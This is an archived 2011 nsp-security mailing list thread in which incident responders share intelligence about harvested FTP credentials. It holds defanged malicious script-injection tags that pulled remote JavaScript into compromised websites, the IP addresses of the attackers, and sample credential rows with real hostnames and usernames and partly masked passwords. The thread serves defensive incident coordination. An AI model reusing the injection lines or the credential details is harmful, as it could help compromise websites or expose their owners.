[nsp-sec] Stolen FTP credentials
Carles Fragoso
cfragoso at cesicat.cat
Wed Apr 20 06:29:03 EDT 2011
Good morning,
I have feedback from some of the victims that allowed us to share following information.
Some websites were accessed and modified to include following injections:
1 <sXXcript type="text/javascript" src="http://www.saglikalemi.com/js.php"></sXXcript>
2 <script type="text/javascript" src="hXXp://shatrappz.com/search.php"></sXXcript>
3 <sXXcript type="text/javascript" src="hXXp://www.zintec.be/js.php"></sXXcript>
4 <sXXcript type="text/javascript" src="hXXp://xsellence.com/search.php"></sXXcript>
5 <sXXcript type="text/javascript" src="hXXp://carmenotokiralama.com/counter.php"></sXXcript>
If we perform a simple GET request, 1, 3 and 4 are returning 404 (Not Found), 2 is returning obfuscated javascript and 5 doesn't return error but just returns "?>" string (maybe is expecting a proper User-Agent or sth else).
Victim websites were accessed from following IPs (* = matched on a lot of domains)
41.226.17.45 AGENCE TUNISIENNE INTERNET AS2609
46.252.128.63 LV RELIKTBVK AS52055 (*)
46.161.24.102 RU TARAKANOVDA AS44050 (*)
114.91.27.93 CN CHINANET SHANGAI AS4812
62.78.39.124 RU WELLCOM AS50289
62.78.36.202 RU WELLCOM AS50289
62.78.43.98 RU RU-WELLCOM AS50289
Hope it helps. Anyone has more feedback about this incident?
-- Carlos
On Apr 20, 2011, at 11:19 AM, Carles Fragoso wrote:
Thomas,
We have already take care of credentials related with .CAT TLD as they are within our constituency ...
766 | 193.144.12.25 | ES | webquest.udl.cat | sanuy | s4****** | REDIRIS RedIRIS Autonomous System
43988 | 94.127.190.29 | ES | ftp.relojes.cat | rellotges | 42****** | ABSERVER-AS Access Basic Server S.L.
43988 | 94.127.190.29 | ES | www.oliolivaartesa.cat<http://www.oliolivaartesa.cat> | oli | 42****** | ABSERVER-AS Access Basic Server S.L.
... but we have also proxified those to trusted peers at ES (Spanish) autonomous systems. See (*) for those already contacted.
114 16371 | ACENS_AS acens technologies (*)
46 43988 | ABSERVER-AS Access Basic Server S.L. (*)
28 3352 | TELEFONICA-DATA-ESPANA Internet Access Network of TDE (*)
22 20718 | AS_ARSYS-EURO-1 arsys.es<http://arsys.es> (*)
11 50926 | INFORTELECOM-AS Infortelecom Hosting, S.L. (*)
6 196834 | SOFTEC_INTERNET Softec Internet, S.L.
5 13287 | NIXVAL NIXVAL Data Center
4 16338 | ONO-AS2 Cableuropa - ONO (*)
3 6739 | ONO-AS Cableuropa - ONO (*)
3 44497 | REDCORUNA-AS REDCORUNA
3 15699 | AS_ADAM Network ADAM DATACENTER - www.adamdatacenter.es<http://www.adamdatacenter.es>
2 42237 | INTERDOMINIOS Grupo Interdominios S.A. (*)
2 196713 | ABANSYS_AND_HOSTYTEC-AS Abansys & Hostytec, S.L. (*)
2 15704 | AS15704 Xtra Telecom, S.L.
2 12769 | IBER-X LET_S GOWEX, S.A.
2 12386 | ASALPI Orange Catalunya Xarxes de Telecomunicacions S.A. (*)
1 8311 | REDESTEL Redestel Networks S.L.
1 5400 | BT BT European Backbone
1 42745 | ARI Ari Business Solutions, S.A.
1 3324 | FUJITSU TECHNOLOGY SOLUTIONS, S.A.
1 31082 | MCCTELECOM-AS MCCTELECOM
1 25487 | DIGITALVALUE-AS Digital Value Autonomous System, Valencia (Spain)
1 2134 | GSVNET-AS GS Virtual Network
1 20838 | YIF-AS France Telecom Espana S.A
1 15919 | INTERHOST Interhost AS
1 12715 | JAZZNET Jazz Telecom S.A.
1 12479 | UNI2-AS France Telecom Espana SA (*)
1 12334 | AS R Cable y Telecomunicaciones Galicia S.A.
I am waiting for feedback from them to see if the credentials have been already abused and its impact.
Keep up the good work. :)
-- Carlos Fragoso
On Apr 19, 2011, at 10:08 AM, Thomas Hungenberg wrote:
please find below a list of stolen FTP login credentials found in several lists
on a server used for malicious activity. Unfortunately, I don't have information
on when and how the credentials were stolen, but the filenames and timestamps
of the lists indicate that they were harvested earlier this month.
Format: ASN | IP | CC | hostname | username | sanitized password | AS desc
- Thomas
More information about the nsp-security
mailing list